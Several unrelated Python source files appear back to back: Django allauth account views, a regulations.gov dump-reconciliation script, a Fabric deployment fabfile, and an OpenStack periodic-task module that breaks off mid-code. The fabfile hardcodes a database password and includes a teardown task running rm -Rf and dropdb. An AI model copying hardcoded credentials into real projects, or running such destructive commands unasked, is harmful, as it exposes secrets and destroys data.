commands, self.stdout, self.stderr) def addDefaultParameters(self, command, parameters): log.info('Checking default parameters for "%s"' % command) if command in NUMPROC_COMMANDS and 'processors' not in parameters: log.info('Adding default value from "numProc" for "processors"') parameters['processors'] = str(self.numProc) return parameters def runJob(self, command, parameters, logFile=None): job = self.createJob(command, parameters, logFile) job() if __name__ == '__main__': mcm = MothurRunner() print "MothurRunner Created"
from django.core.urlresolvers import reverse, reverse_lazy from django.http import (HttpResponseRedirect, Http404, HttpResponsePermanentRedirect) from django.views.generic.base import TemplateResponseMixin, View, TemplateView from django.views.generic.edit import FormView from django.contrib import messages from django.contrib.auth.decorators import login_required from django.contrib.auth import logout as auth_logout from django.shortcuts import redirect from django.views.decorators.debug import sensitive_post_parameters from django.utils.decorators import method_decorator from ..exceptions import ImmediateHttpResponse from ..utils import get_form_class, get_request_param, get_current_site from .utils import (get_next_redirect_url, complete_signup, get_login_redirect_url, perform_login, passthrough_next_redirect_url, url_str_to_user_pk) from .forms import ( AddEmailForm, ChangePasswordForm, LoginForm, ResetPasswordKeyForm, ResetPasswordForm, SetPasswordForm, SignupForm, UserTokenForm) from .utils import sync_user_email_addresses from .models import EmailAddress, EmailConfirmation from . import signals from . import app_settings from .adapter import get_adapter try: from django.contrib.auth import update_session_auth_hash except ImportError: update_session_auth_hash = None sensitive_post_parameters_m = method_decorator( sensitive_post_parameters('password', 'password1', 'password2')) def _ajax_response(request, response, form=None): if request.is_ajax(): if (isinstance(response, HttpResponseRedirect) or isinstance(response, HttpResponsePermanentRedirect)): redirect_to = response['Location'] else: redirect_to = None response = get_adapter().ajax_response(request, response, form=form, redirect_to=redirect_to) return response class RedirectAuthenticatedUserMixin(object): def dispatch(self, request, *args, **kwargs): # WORKAROUND: https://code.djangoproject.com/ticket/19316 self.request = request # (end WORKAROUND) if request.user.is_authenticated(): redirect_to = self.get_authenticated_redirect_url() response = HttpResponseRedirect(redirect_to) return _ajax_response(request, response) else: response = super(RedirectAuthenticatedUserMixin, self).dispatch(request, *args, **kwargs) return response def get_authenticated_redirect_url(self): redirect_field_name = self.redirect_field_name return get_login_redirect_url(self.request, url=self.get_success_url(), redirect_field_name=redirect_field_name) class AjaxCapableProcessFormViewMixin(object): def post(self, request, *args, **kwargs): form_class = self.get_form_class() form = self.get_form(form_class) if form.is_valid(): response = self.form_valid(form) else: response = self.form_invalid(form) return _ajax_response(self.request, response, form=form) class LoginView(RedirectAuthenticatedUserMixin, AjaxCapableProcessFormViewMixin, FormView): form_class = LoginForm template_name = "account/login.html" success_url = None redirect_field_name = "next" @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): return super(LoginView, self).dispatch(request, *args, **kwargs) def get_form_class(self): return get_form_class(app_settings.FORMS, 'login', self.form_class) def form_valid(self, form): success_url = self.get_success_url() try: return form.login(self.request, redirect_url=success_url) except ImmediateHttpResponse as e: return e.response def get_success_url(self): # Explicitly passed ?next= URL takes precedence ret = (get_next_redirect_url(self.request, self.redirect_field_name) or self.success_url) return ret def get_context_data(self, **kwargs): ret = super(LoginView, self).get_context_data(**kwargs) signup_url = passthrough_next_redirect_url(self.request, reverse("account_signup"), self.redirect_field_name) redirect_field_value = get_request_param(self.request, self.redirect_field_name) site = get_current_site(self.request) ret.update({"signup_url": signup_url, "site": site, "redirect_field_name": self.redirect_field_name, "redirect_field_value": redirect_field_value}) return ret login = LoginView.as_view() class CloseableSignupMixin(object): template_name_signup_closed = "account/signup_closed.html" def dispatch(self, request, *args, **kwargs): # WORKAROUND: https://code.djangoproject.com/ticket/19316 self.request = request # (end WORKAROUND) try: if not self.is_open(): return self.closed() except ImmediateHttpResponse as e: return e.response return super(CloseableSignupMixin, self).dispatch(request, *args, **kwargs) def is_open(self): return get_adapter().is_open_for_signup(self.request) def closed(self): response_kwargs = { "request": self.request, "template": self.template_name_signup_closed, } return self.response_class(**response_kwargs) class SignupView(RedirectAuthenticatedUserMixin, CloseableSignupMixin, AjaxCapableProcessFormViewMixin, FormView): template_name = "account/signup.html" form_class = SignupForm redirect_field_name = "next" success_url = None @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): return super(SignupView, self).dispatch(request, *args, **kwargs) def get_form_class(self): return get_form_class(app_settings.FORMS, 'signup', self.form_class) def get_success_url(self): # Explicitly passed ?next= URL takes precedence ret = (get_next_redirect_url(self.request, self.redirect_field_name) or self.success_url) return ret def form_valid(self, form): user = form.save(self.request) return complete_signup(self.request, user, app_settings.EMAIL_VERIFICATION, self.get_success_url()) def get_context_data(self, **kwargs): form = kwargs['form'] form.fields["email"].initial = self.request.session \ .get('account_verified_email', None) ret = super(SignupView, self).get_context_data(**kwargs) login_url = passthrough_next_redirect_url(self.request, reverse("account_login"), self.redirect_field_name) redirect_field_name = self.redirect_field_name redirect_field_value = get_request_param(self.request, redirect_field_name) ret.update({"login_url": login_url, "redirect_field_name": redirect_field_name, "redirect_field_value": redirect_field_value}) return ret signup = SignupView.as_view() class ConfirmEmailView(TemplateResponseMixin, View): def get_template_names(self): if self.request.method == 'POST': return ["account/email_confirmed.html"] else: return ["account/email_confirm.html"] def get(self, *args, **kwargs): try: self.object = self.get_object() if app_settings.CONFIRM_EMAIL_ON_GET: return self.post(*args, **kwargs) except Http404: self.object = None ctx = self.get_context_data() return self.render_to_response(ctx) def post(self, *args, **kwargs): self.object = confirmation = self.get_object() confirmation.confirm(self.request) get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/email_confirmed.txt', {'email': confirmation.email_address.email}) if app_settings.LOGIN_ON_EMAIL_CONFIRMATION: resp = self.login_on_confirm(confirmation) if resp is not None: return resp # Don't -- allauth doesn't touch is_active so that sys admin can # use it to block users et al # # user = confirmation.email_address.user # user.is_active = True # user.save() redirect_url = self.get_redirect_url() if not redirect_url: ctx = self.get_context_data() return self.render_to_response(ctx) return redirect(redirect_url) def login_on_confirm(self, confirmation): """ Simply logging in the user may become a security issue. If you do not take proper care (e.g. don't purge used email confirmations), a malicious person that got hold of the link will be able to login over and over again and the user is unable to do anything about it. Even restoring their own mailbox security will not help, as the links will still work. For password reset this is different, this mechanism works only as long as the attacker has access to the mailbox. If they no longer has access they cannot issue a password request and intercept it. Furthermore, all places where the links are listed (log files, but even Google Analytics) all of a sudden need to be secured. Purging the email confirmation once confirmed changes the behavior -- users will not be able to repeatedly confirm (in case they forgot that they already clicked the mail). All in all, opted for storing the user that is in the process of signing up in the session to avoid all of the above. This may not 100% work in case the user closes the browser (and the session gets lost), but at least we're secure. """ user_pk = None user_pk_str = self.request.session.pop('account_user', None) if user_pk_str: user_pk = url_str_to_user_pk(user_pk_str) user = confirmation.email_address.user if user_pk == user.pk and self.request.user.is_anonymous(): return perform_login(self.request, user, app_settings.EmailVerificationMethod.NONE, # passed as callable, as this method # depends on the authenticated state redirect_url=self.get_redirect_url) return None def get_object(self, queryset=None): if queryset is None: queryset = self.get_queryset() try: return queryset.get(key=self.kwargs["key"].lower()) except EmailConfirmation.DoesNotExist: raise Http404() def get_queryset(self): qs = EmailConfirmation.objects.all_valid() qs = qs.select_related("email_address__user") return qs def get_context_data(self, **kwargs): ctx = kwargs ctx["confirmation"] = self.object return ctx def get_redirect_url(self): return get_adapter().get_email_confirmation_redirect_url(self.request) confirm_email = ConfirmEmailView.as_view() class EmailView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/email.html" form_class = AddEmailForm success_url = reverse_lazy('account_email') def get_form_class(self): return get_form_class(app_settings.FORMS, 'add_email', self.form_class) def dispatch(self, request, *args, **kwargs): sync_user_email_addresses(request.user) return super(EmailView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(EmailView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): email_address = form.save(self.request) get_adapter().add_message(self.request, messages.INFO, 'account/messages/' 'email_confirmation_sent.txt', {'email': form.cleaned_data["email"]}) signals.email_added.send(sender=self.request.user.__class__, request=self.request, user=self.request.user, email_address=email_address) return super(EmailView, self).form_valid(form) def post(self, request, *args, **kwargs): res = None if "action_add" in request.POST: res = super(EmailView, self).post(request, *args, **kwargs) elif request.POST.get("email"): if "action_send" in request.POST: res = self._action_send(request) elif "action_remove" in request.POST: res = self._action_remove(request) elif "action_primary" in request.POST: res = self._action_primary(request) res = res or HttpResponseRedirect(reverse('account_email')) # Given that we bypassed AjaxCapableProcessFormViewMixin, # we'll have to call invoke it manually... res = _ajax_response(request, res) else: # No email address selected res = HttpResponseRedirect(reverse('account_email')) res = _ajax_response(request, res) return res def _action_send(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get( user=request.user, email=email, ) get_adapter().add_message(request, messages.INFO, 'account/messages/' 'email_confirmation_sent.txt', {'email': email}) email_address.send_confirmation(request) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def _action_remove(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get( user=request.user, email=email ) if email_address.primary: get_adapter().add_message(request, messages.ERROR, 'account/messages/' 'cannot_delete_primary_email.txt', {"email": email}) else: email_address.delete() signals.email_removed.send(sender=request.user.__class__, request=request, user=request.user, email_address=email_address) get_adapter().add_message(request, messages.SUCCESS, 'account/messages/email_deleted.txt', {"email": email}) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def _action_primary(self, request, *args, **kwargs): email = request.POST["email"] try: email_address = EmailAddress.objects.get_for_user( user=request.user, email=email ) # Not primary=True -- Slightly different variation, don't # require verified unless moving from a verified # address. Ignore constraint if previous primary email # address is not verified. if not email_address.verified and \ EmailAddress.objects.filter(user=request.user, verified=True).exists(): get_adapter().add_message(request, messages.ERROR, 'account/messages/' 'unverified_primary_email.txt') else: # Sending the old primary address to the signal # adds a db query. try: from_email_address = EmailAddress.objects \ .get(user=request.user, primary=True) except EmailAddress.DoesNotExist: from_email_address = None email_address.set_as_primary() get_adapter() \ .add_message(request, messages.SUCCESS, 'account/messages/primary_email_set.txt') signals.email_changed \ .send(sender=request.user.__class__, request=request, user=request.user, from_email_address=from_email_address, to_email_address=email_address) return HttpResponseRedirect(self.get_success_url()) except EmailAddress.DoesNotExist: pass def get_context_data(self, **kwargs): ret = super(EmailView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['add_email_form'] = ret.get('form') # (end NOTE) return ret email = login_required(EmailView.as_view()) class PasswordChangeView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_change.html" form_class = ChangePasswordForm success_url = reverse_lazy("account_change_password") def get_form_class(self): return get_form_class(app_settings.FORMS, 'change_password', self.form_class) @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): if not request.user.has_usable_password(): return HttpResponseRedirect(reverse('account_set_password')) return super(PasswordChangeView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordChangeView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): form.save() if (update_session_auth_hash is not None and not app_settings.LOGOUT_ON_PASSWORD_CHANGE): update_session_auth_hash(self.request, form.user) get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_changed.txt') signals.password_changed.send(sender=self.request.user.__class__, request=self.request, user=self.request.user) return super(PasswordChangeView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordChangeView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_change_form'] = ret.get('form') # (end NOTE) return ret password_change = login_required(PasswordChangeView.as_view()) class PasswordSetView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_set.html" form_class = SetPasswordForm success_url = reverse_lazy("account_set_password") def get_form_class(self): return get_form_class(app_settings.FORMS, 'set_password', self.form_class) @sensitive_post_parameters_m def dispatch(self, request, *args, **kwargs): if request.user.has_usable_password(): return HttpResponseRedirect(reverse('account_change_password')) return super(PasswordSetView, self).dispatch(request, *args, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordSetView, self).get_form_kwargs() kwargs["user"] = self.request.user return kwargs def form_valid(self, form): form.save() get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_set.txt') signals.password_set.send(sender=self.request.user.__class__, request=self.request, user=self.request.user) return super(PasswordSetView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordSetView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_set_form'] = ret.get('form') # (end NOTE) return ret password_set = login_required(PasswordSetView.as_view()) class PasswordResetView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_reset.html" form_class = ResetPasswordForm success_url = reverse_lazy("account_reset_password_done") def get_form_class(self): return get_form_class(app_settings.FORMS, 'reset_password', self.form_class) def form_valid(self, form): form.save(self.request) return super(PasswordResetView, self).form_valid(form) def get_context_data(self, **kwargs): ret = super(PasswordResetView, self).get_context_data(**kwargs) # NOTE: For backwards compatibility ret['password_reset_form'] = ret.get('form') # (end NOTE) return ret password_reset = PasswordResetView.as_view() class PasswordResetDoneView(TemplateView): template_name = "account/password_reset_done.html" password_reset_done = PasswordResetDoneView.as_view() class PasswordResetFromKeyView(AjaxCapableProcessFormViewMixin, FormView): template_name = "account/password_reset_from_key.html" form_class = ResetPasswordKeyForm success_url = reverse_lazy("account_reset_password_from_key_done") def get_form_class(self): return get_form_class(app_settings.FORMS, 'reset_password_from_key', self.form_class) def dispatch(self, request, uidb36, key, **kwargs): self.request = request self.key = key # (Ab)using forms here to be able to handle errors in XHR #890 token_form = UserTokenForm(data={'uidb36': uidb36, 'key': key}) if not token_form.is_valid(): response = self.render_to_response( self.get_context_data(token_fail=True) ) return _ajax_response(self.request, response, form=token_form) else: self.reset_user = token_form.reset_user return super(PasswordResetFromKeyView, self).dispatch(request, uidb36, key, **kwargs) def get_form_kwargs(self): kwargs = super(PasswordResetFromKeyView, self).get_form_kwargs() kwargs["user"] = self.reset_user kwargs["temp_key"] = self.key return kwargs def form_valid(self, form): form.save() get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/password_changed.txt') signals.password_reset.send(sender=self.reset_user.__class__, request=self.request, user=self.reset_user) if app_settings.LOGIN_ON_PASSWORD_RESET: return perform_login(self.request, self.reset_user, email_verification=app_settings.EMAIL_VERIFICATION) return super(PasswordResetFromKeyView, self).form_valid(form) password_reset_from_key = PasswordResetFromKeyView.as_view() class PasswordResetFromKeyDoneView(TemplateView): template_name = "account/password_reset_from_key_done.html" password_reset_from_key_done = PasswordResetFromKeyDoneView.as_view() class LogoutView(TemplateResponseMixin, View): template_name = "account/logout.html" redirect_field_name = "next" def get(self, *args, **kwargs): if app_settings.LOGOUT_ON_GET: return self.post(*args, **kwargs) if not self.request.user.is_authenticated(): return redirect(self.get_redirect_url()) ctx = self.get_context_data() return self.render_to_response(ctx) def post(self, *args, **kwargs): url = self.get_redirect_url() if self.request.user.is_authenticated(): self.logout() return redirect(url) def logout(self): get_adapter().add_message(self.request, messages.SUCCESS, 'account/messages/logged_out.txt') auth_logout(self.request) def get_context_data(self, **kwargs): ctx = kwargs redirect_field_value = get_request_param(self.request, self.redirect_field_name) ctx.update({ "redirect_field_name": self.redirect_field_name, "redirect_field_value": redirect_field_value}) return ctx def get_redirect_url(self): return (get_next_redirect_url(self.request, self.redirect_field_name) or get_adapter().get_logout_redirect_url(self.request)) logout = LogoutView.as_view() class AccountInactiveView(TemplateView): template_name = 'account/account_inactive.html' account_inactive = AccountInactiveView.as_view() class EmailVerificationSentView(TemplateView): template_name = 'account/verification_sent.html' email_verification_sent = EmailVerificationSentView.as_view()
GEVENT = False import os import settings import sys from search import parse, iter_parse, result_to_model import pytz import datetime import operator import time import json import re from regs_common.tmp_redis import TmpRedis from regs_common.mp_types import Counter from regs_common.util import listify from regsdotgov.document import make_view from regs_models import * import multiprocessing from Queue import Empty from optparse import OptionParser arg_parser = OptionParser() arg_parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=multiprocessing.cpu_count(), help="Set number of worker processes. Defaults to number of cores if not specified.") arg_parser.add_option("-k", "--keep-cache", dest="keep_cache", action="store_true", default=False, help="Prevents the cache from being deleted at the end of processing to make testing faster.") arg_parser.add_option("-u", "--use-cache", dest="use_cache", action="store", default=None, help="Use pre-existing cache to make testing faster.") arg_parser.add_option("-A", "--add-only", dest="add_only", action="store_true", default=False, help="Skip reconciliation, assume that all records are new, and go straight to the add step.") arg_parser.add_option("-a", "--agency", dest="agency", action="store", type="string", default=None, help="Specify an agency to which to limit the dump.") arg_parser.add_option("-d", "--docket", dest="docket", action="store", type="string", default=None, help="Specify a docket to which to limit the dump.") def repair_views(old_views, new_views): for new_view in new_views: already_exists = [view for view in old_views if view.type == new_view.type] if not already_exists: old_views.append(new_view) elif already_exists and already_exists[0].downloaded == 'failed': already_exists[0].downloaded = "no" def reconcile_process(record, cache, db, now, repaired_counter, updated_counter, deleted_counter): # check and see if this doc has been updated new_record = cache.get(record['_id']) if new_record: # do we need to fix anything? statuses = [[view['downloaded'] for view in record.get('views', [])]] + [[view['downloaded'] for view in attachment.get('views', [])] for attachment in record.get('attachments', [])] #main_views = [make_view(format) for format in listify(new_record.get('fileFormats', []))] if record['scraped'] == 'failed' or 'failed' in reduce(operator.add, statuses, []) or (record['scraped'] == 'yes' and len(record.get('attachments', [])) != new_record.get('attachmentCount', 0)): # needs a repair; grab the full document current_docs = Doc.objects(id=record['_id']) db_doc = current_docs[0] db_doc.scraped = "no" # rebuild views #repair_views(db_doc.views, main_views) # update the last-seen date db_doc.last_seen = now # reset a couple of flags to trigger reprocessing db_doc.in_search_index = False db_doc.in_cluster_db = False db_doc.entities_last_extracted = None # do save try: db_doc.save() repaired_counter.increment() except: print "Failed to repair %s" % db_doc.id else: # we don't need a full repair, so just do an update on the date Doc.objects(id=record['_id']).update_one(set__last_seen=now) updated_counter.increment() # either way, delete the document from the cache so we can tell what's new at the end cache.delete(record['_id']) else: # this document isn't in the new data anymore, so mark it deleted Doc.objects(id=record['_id']).update_one(set__deleted=True) deleted_counter.increment() def reconcile_worker(todo_queue, cache_wrapper, now, repaired_counter, updated_counter, deleted_counter): pid = os.getpid() print '[%s] Reconciliation worker started.' % pid cache = cache_wrapper.get_pickle_connection() import pymongo db = pymongo.Connection(**settings.DB_SETTINGS)[settings.DB_NAME] while True: record = todo_queue.get() reconcile_process(record, cache, db, now, repaired_counter, updated_counter, deleted_counter) todo_queue.task_done() def add_new_docs(cache_wrapper, now): print 'Adding new documents to the database...' cache = cache_wrapper.get_pickle_connection() new = 0 for id in cache.keys(): doc = cache.get(id) if doc.get('documentStatus', None) == "Withdrawn": continue db_doc = result_to_model(doc, now=now) try: db_doc.save() new += 1 except: print "Failed to save document %s" % db_doc.id written = new print 'Wrote %s new documents.' % (written) return written def reconcile_dumps(options, cache_wrapper, now): sys.stdout.write('Reconciling dumps with current data...\n') sys.stdout.flush() # get workers going num_workers = options.multi todo_queue = multiprocessing.JoinableQueue(num_workers * 3) repaired_counter = Counter() updated_counter = Counter() deleted_counter = Counter() processes = [] for i in range(num_workers): proc = multiprocessing.Process(target=reconcile_worker, args=(todo_queue, cache_wrapper, now, repaired_counter, updated_counter, deleted_counter)) proc.start() processes.append(proc) import pymongo db = pymongo.Connection(**settings.DB_SETTINGS)[settings.DB_NAME] conditions = {'last_seen': {'$lt': now}, 'deleted': False, 'source': 'regulations.gov'} if options.agency: conditions['agency'] = options.agency if options.docket: conditions['docket_id'] = options.docket fields = {'_id': 1, 'scraped': 1, 'views.downloaded': 1, 'views.type': 1, 'attachments.views.downloaded': 1, 'attachments.views.type': 1, 'attachments.object_id': 1} to_check = db.docs.find(conditions, fields) while True: try: record = to_check.next() except pymongo.errors.OperationFailure: print 'OH NOES!' to_scrape = db.docs.find(conditions, fields) continue except StopIteration: break todo_queue.put(record) todo_queue.join() for proc in processes: print 'Terminating reconciliation worker %s...' % proc.pid proc.terminate() # compile and print some stats num_updated = updated_counter.value num_repaired = repaired_counter.value num_deleted = deleted_counter.value num_docs = num_updated + num_repaired + num_deleted print 'Reconciliation complete: examined %s documents, of which %s were updated, %s were repaired, and %s were flagged as deleted.' % (num_docs, num_updated, num_repaired, num_deleted) return {'updated': num_updated, 'repaired': num_repaired, 'deleted': num_deleted} def parser_process(file, cache): docs = iter_parse(os.path.join(settings.DUMP_DIR, file)) print '[%s] Done with JSON decode.' % os.getpid() count = 0 for doc in docs: cache.set(doc['documentId'], doc) count += 1 return {'docs': count} def parser_worker(todo_queue, done_queue, cache_wrapper): pid = os.getpid() print '[%s] Parser worker started.' % pid cache = cache_wrapper.get_pickle_connection() while True: file = todo_queue.get() sys.stdout.write('[%s] Parsing file %s...\n' % (pid, file)) sys.stdout.flush() start = datetime.datetime.now() stats = parser_process(file, cache) elapsed = datetime.datetime.now() - start sys.stdout.write('[%s] Done with %s in %s minutes\n' % (pid, file, round(elapsed.total_seconds() / 60.0))) sys.stdout.flush() done_queue.put(stats) todo_queue.task_done() def parse_dumps(options, cache_wrapper): # figure out which files are ours id_string = 'all' if options.agency and options.docket: raise Exception("Specify either an agency or a docket") elif options.agency: id_string = 'agency_' + options.agency elif options.docket: id_string = 'docket_' + options.docket.replace('-', '_') num_workers = options.multi files = [file for file in os.listdir(settings.DUMP_DIR) if file.startswith('dump_%s' % id_string) and file.endswith('.json')] if len(files) < 1: # something is wrong, as there should be more than ten files raise Exception('Too few .json files; something went wrong.') # it's a small number of files, so just make a queue big enough to hold them all, to keep from having to block todo_queue = multiprocessing.JoinableQueue(len(files)) done_queue = multiprocessing.Queue(len(files)) sys.stdout.write('Starting parser workers...\n') processes = [] for i in range(num_workers): proc = multiprocessing.Process(target=parser_worker, args=(todo_queue, done_queue, cache_wrapper)) proc.start() processes.append(proc) for file in files: todo_queue.put(file) todo_queue.join() for proc in processes: print 'Terminating parser worker %s...' % proc.pid proc.terminate() # print totals print 'Done parsing files.' def run(options, args): sys.stdout.write('Starting decoding...\n') sys.stdout.flush() # get workers going now = datetime.datetime.now(tz=pytz.utc) num_workers = options.multi # set up caching sys.stdout.write('Spinning up Redis instance...\n') if options.use_cache: cache_wrapper = TmpRedis(db_uuid=options.use_cache) # give it time to rebuild its cache from disk if we're using an already-built cache sys.stdout.write('Loading cache from disk...') time.sleep(15) sys.stdout.write(' done.\n') else: cache_wrapper = TmpRedis() parse_dumps(options, cache_wrapper) stats = {} if not options.add_only: stats = reconcile_dumps(options, cache_wrapper, now) else: print 'Skipping reconciliation step.' # still-existing and deleted stuff is now done, but we still have to do the new stuff stats['new'] = add_new_docs(cache_wrapper, now) sys.stdout.write('Terminating Redis cache...\n') if options.keep_cache: cache_wrapper.terminate(delete=False) print 'Cache preserved with UUID %s.' % cache_wrapper.uuid else: cache_wrapper.terminate() return stats
#!/usr/bin/env python from fabric.api import * """ Base configuration """ env.project_name = 'hacktyler_crime' env.database_password = 'qw8ndyHprt' env.path = '/home/ubuntu/src/%(project_name)s' % env env.log_path = '/var/log/src/%(project_name)s' % env env.env_path = '/home/ubuntu/.virtualenvs/%(project_name)s' % env env.repo_path = '%(path)s' % env env.server_config_path = '/etc/nginx/sites-enabled/%(project_name)s' % env env.python = 'python2.7' env.repository_url = "git@github.com:hacktyler/hacktyler_crime.git" env.user = 'ubuntu' env.hosts = ['hasufel.hacktyler.com'] """ Branches """ def stable(): """ Work on stable branch. """ env.branch = 'stable' def master(): """ Work on development branch. """ env.branch = 'master' def branch(branch_name): """ Work on any specified branch. """ env.branch = branch_name """ Commands - setup """ def setup(): """ Setup a fresh virtualenv, install everything we need, and fire up the database. """ require('branch', provided_by=[stable, master, branch]) setup_directories() setup_virtualenv() clone_repo() checkout_latest() install_requirements() destroy_database() create_database() syncdb() install_server_conf() collect_static_files() reload_app(); def setup_directories(): """ Create directories necessary for deployment. """ run('mkdir -p %(path)s' % env) sudo('mkdir -p /var/log/sites/%(project_name)s/' % env, user='uwsgi') sudo('touch /var/log/sites/hacktyler_crime/hacktyler_crime.log', user='uwsgi') def setup_virtualenv(): """ Setup a fresh virtualenv. """ run('virtualenv -p %(python)s --no-site-packages %(env_path)s;' % env) run('source %(env_path)s/bin/activate;' % env) def clone_repo(): """ Do initial clone of the git repository. """ run('git clone %(repository_url)s %(repo_path)s' % env) def checkout_latest(): """ Pull the latest code on the specified branch. """ run('cd %(repo_path)s; git checkout %(branch)s; git pull origin %(branch)s' % env) def install_requirements(): """ Install the required packages using pip. """ run('source %(env_path)s/bin/activate; pip install -r %(repo_path)s/requirements.txt' % env) def install_server_conf(): """ Install the server config file. """ sudo('ln -s %(repo_path)s/config/deployed/nginx %(server_config_path)s' % env) sudo('ln -s %(repo_path)s/config/deployed/uwsgi.conf /etc/init/%(project_name)s.conf' % env) sudo('initctl reload-configuration' % env) """ Commands - deployment """ def deploy(): """ Deploy the latest version of the site to the server and restart the web server. Does not perform the functions of load_new_data(). """ require('branch', provided_by=[stable, master, branch]) checkout_latest() collect_static_files() reload_app() def collect_static_files(): """ Collect static files on the server. """ sudo('cd %(repo_path)s; %(env_path)s/bin/python manage.py collectstatic --noinput' % env, user="uwsgi") def reload_app(): """ Restart the uwsgi server. """ sudo('service %(project_name)s restart' % env) def update_requirements(): """ Update the installed dependencies the server. """ run('source %(env_path)s/bin/activate; pip install -q -U -r %(repo_path)s/requirements.txt' % env) """ Commands - data """ def reset_database(): """ Drop and recreate the project database. """ pgpool_down() destroy_database() create_database() syncdb() pgpool_up() def create_database(): """ Creates the user and database for this project. """ sudo('echo "CREATE USER %(project_name)s WITH PASSWORD \'%(database_password)s\';" | psql postgres' % env, user='postgres') sudo('createdb -T template_postgis -O %(project_name)s %(project_name)s' % env, user='postgres') def destroy_database(): """ Destroys the user and database for this project. Will not cause the fab to fail if they do not exist. """ pgpool_down() with settings(warn_only=True): sudo('dropdb %(project_name)s' % env, user='postgres') sudo('dropuser %(project_name)s' % env, user='postgres') pgpool_up() def syncdb(): """ Sync the Django models to the database. """ sudo('cd %(repo_path)s; %(env_path)s/bin/python manage.py syncdb --noinput' % env, user="uwsgi") def pgpool_down(): """ Stop pgpool so that it won't prevent the database from being rebuilt. """ sudo('service pgpool2 stop') def pgpool_up(): """ Start pgpool. """ sudo('service pgpool2 start') """ Commands - local """ def local_reset(): """ Reset the local database and Solr instance. """ local_reset_database() def local_reset_database(): """ Reset the local database. """ with settings(warn_only=True): local('dropdb %(project_name)s' % env) #local('dropuser %(project_name)s' % env) #local('echo "CREATE USER %(project_name)s WITH PASSWORD \'%(database_password)s\';" | psql postgres' % env) local('createdb -O %(project_name)s %(project_name)s -T template_postgis' % env) local('python manage.py syncdb --noinput' % env) """ Deaths, destroyers of worlds """ def shiva_the_destroyer(): """ Remove all directories, databases, etc. associated with the application. """ with settings(warn_only=True): run('rm -Rf %(path)s' % env) run('rm -Rf %(log_path)s' % env) run('rm -Rf %(env_path)s' % env) pgpool_down() run('dropdb %(project_name)s' % env) run('dropuser %(project_name)s' % env) pgpool_up() sudo('rm %(server_config_path)s' % env) reload_app()
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import random import time from oslo.config import cfg import six from neutron_vpnaas.openstack.common._i18n import _, _LE, _LI from neutron_vpnaas.openstack.common import log as logging periodic_opts = [ cfg.BoolOpt('run_external_periodic_tasks', default=True, help='Some periodic tasks can be run in a separate process. ' 'Should we run them here?'), ] CONF = cfg.CONF CONF.register_opts(periodic_opts) LOG = logging.getLogger(__name__) DEFAULT_INTERVAL = 60.0 def list_opts(): """Entry point for oslo.config-generator.""" return [(None, copy.deepcopy(periodic_opts))] class InvalidPeriodicTaskArg(Exception): message = _("Unexpected argument for periodic task creation: %(arg)s.") def periodic_task(*args, **kwargs): """Decorator to indicate that a method is a periodic task. This decorator can be used in two ways: 1. Without arguments '@periodic_task', this will be run on the default interval of 60 seconds. 2. With arguments: @periodic_task(spacing=N [, run_immediately=[True|False]]) this will be run on approximately every N seconds. If this number is negative the periodic task will be disabled. If the run_immediately argument is provided and has a value of 'True', the first run of the task will be shortly after task scheduler starts. If run_immediately is omitted or set to 'False', the first time the task runs will be approximately N seconds after the task scheduler starts. """ def decorator(f): # Test for old style invocation if 'ticks_between_runs' in kwargs: raise InvalidPeriodicTaskArg(arg='ticks_between_runs') # Control if run at all f._periodic_task = True f._periodic_external_ok = kwargs.pop('external_process_ok', False) if f._periodic_external_ok and not CONF.run_external_periodic_tasks: f._periodic_enabled = False else: f._periodic_enabled = kwargs.pop('enabled', True) # Control frequency f._periodic_spacing = kwargs.pop('spacing', 0) f._periodic_immediate = kwargs.pop('run_immediately', False) if f._periodic_immediate: f._periodic_last_run = None else: f._periodic_last_run = time.time() return f # NOTE(sirp): The `if` is necessary to allow the decorator to be used with # and without parenthesis. # # In the 'with-parenthesis' case (with kwargs present), this function needs # to return a decorator function since the interpreter will invoke it like: # # periodic_task(*args, **kwargs)(f) # # In the 'without-parenthesis' case, the original function will be passed # in as the first argument, like: # # periodic_task(f) if kwargs: return decorator else: return decorator(args[0]) class _PeriodicTasksMeta(type): def __init__(cls, names, bases, dict_): """Metaclass that allows us to collect decorated periodic tasks.""" super(_PeriodicTasksMeta, cls).__init__(names, bases, dict_) # NOTE(sirp): if the attribute is not present then we must be the base # class, so, go ahead an initialize it. If the attribute is present, # then we're a subclass so make a copy of it so we don't step on our # parent's toes. try: cls._periodic_tasks = cls._periodic_tasks[:] except AttributeError: cls._periodic_tasks = [] try: cls._periodic_spacing = cls._periodic_spacing.copy() except AttributeError: cls._periodic_spacing = {} for value in cls.__dict__.values(): if getattr(value, 